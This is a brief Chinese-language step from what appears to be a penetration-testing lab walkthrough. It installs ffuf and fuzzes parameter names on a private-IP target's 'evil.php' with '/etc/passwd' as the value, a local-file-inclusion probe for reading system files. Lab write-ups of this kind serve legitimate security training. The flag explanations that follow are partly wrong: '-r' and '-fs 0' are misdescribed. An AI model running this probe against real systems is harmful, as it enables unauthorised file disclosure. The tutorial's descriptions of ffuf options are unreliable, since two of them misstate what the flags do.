(1)安装所需的工具和字典
命令:
apt install ffuf
字典 下载链接
2.使用ffuf爆破参数:
命令:
ffuf -c -r -u 'http://192.168.0.106/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0
-c :显示输出结果的颜色。
-r :指定ffuf工具对url中的FUZZ关键字进行递归扫描。
-u :指定网站,其中要代替的值换为“FUZZ”
-w :指定字典路径。
-fs 0 :设置隐藏状态码为 0,即将隐藏任何返回状态码为 0 的响应。